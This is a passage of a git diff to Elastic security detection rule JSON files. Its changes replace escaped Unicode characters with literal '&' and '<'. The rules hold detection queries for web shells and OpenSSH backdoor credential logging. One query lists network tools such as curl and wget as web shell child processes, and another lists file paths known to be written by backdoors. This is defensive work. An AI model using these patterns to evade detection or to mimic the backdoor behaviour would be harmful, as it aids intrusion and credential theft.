\"ip\", \"curl\", \"wget\", \"pwd\") and\nnot process.name == \"phpquery\"\n", "references": [ "https://pentestlab.blog/tag/web-shell/", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f243fe39-83a4-46f3-a3b6-707557a102df_1.json b/packages/security_detection_engine/kibana/security_rule/f243fe39-83a4-46f3-a3b6-707557a102df_1.json index 6eebfd887d8..65123ada884 100644 --- a/packages/security_detection_engine/kibana/security_rule/f243fe39-83a4-46f3-a3b6-707557a102df_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f243fe39-83a4-46f3-a3b6-707557a102df_1.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -72,7 +72,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_103.json b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_103.json index 83d45fbf63e..c3c59281b0f 100644 --- a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_103.json @@ -44,7 +44,7 @@ ], "risk_score": 47, "rule_id": "f24bcae1-8980-4b30-b5dd-f851b055c9e7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_104.json b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_104.json index 0910bf1cbdf..f9b68621d35 100644 --- a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_104.json @@ -44,7 +44,7 @@ ], "risk_score": 47, "rule_id": "f24bcae1-8980-4b30-b5dd-f851b055c9e7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_105.json b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_105.json index 6be47f2351a..6281a8d2e82 100644 --- a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_105.json @@ -44,7 +44,7 @@ ], "risk_score": 47, "rule_id": "f24bcae1-8980-4b30-b5dd-f851b055c9e7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_106.json b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_106.json index 768cf4c985c..e7d8bb74250 100644 --- a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_106.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "f24bcae1-8980-4b30-b5dd-f851b055c9e7", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_107.json b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_107.json index bee11c3a19e..00c9d7b240c 100644 --- a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_107.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -69,7 +69,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_103.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_103.json index 868ac7a53fb..0580939e31d 100644 --- a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_103.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_104.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_104.json index 62517ef2160..95c59b5e056 100644 --- a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_104.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_105.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_105.json index 97a874b5616..81976e79764 100644 --- a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_105.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_106.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_106.json index 0f1069712d8..32974318821 100644 --- a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_106.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential OpenSSH Backdoor Logging Activity", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "file where host.os.type == \"linux\" and event.type == \"change\" and process.executable : (\"/usr/sbin/sshd\", \"/usr/bin/ssh\") and\n (\n (file.name : (\".*\", \"~*\", \"*~\") and not file.name : (\".cache\", \".viminfo\", \".bash_history\")) or\n file.extension : (\"in\", \"out\", \"ini\", \"h\", \"gz\", \"so\", \"sock\", \"sync\", \"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\") or\n file.path :\n (\n \"/private/etc/*--\",\n \"/usr/share/*\",\n \"/usr/include/*\",\n \"/usr/local/include/*\",\n \"/private/tmp/*\",\n \"/private/var/tmp/*\",\n \"/usr/tmp/*\",\n \"/usr/share/man/*\",\n \"/usr/local/share/*\",\n \"/usr/lib/*.so.*\",\n \"/private/etc/ssh/.sshd_auth\",\n \"/usr/bin/ssd\",\n \"/private/var/opt/power\",\n \"/private/etc/ssh/ssh_known_hosts\",\n \"/private/var/html/lol\",\n \"/private/var/log/utmp\",\n \"/private/var/lib\",\n \"/var/run/sshd/sshd.pid\",\n \"/var/run/nscd/ns.pid\",\n \"/var/run/udev/ud.pid\",\n \"/var/run/udevd.pid\"\n )\n )\n", "references": [ "https://github.com/eset/malware-ioc/tree/master/sshdoor", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_107.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_107.json index 2895ddabcd5..0d217c42b63 100644 --- a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_107.json @@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_108.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_108.json index fa4c2445ea0..32c0312b7ad 100644 --- a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_108.json +++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_108.json @@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup 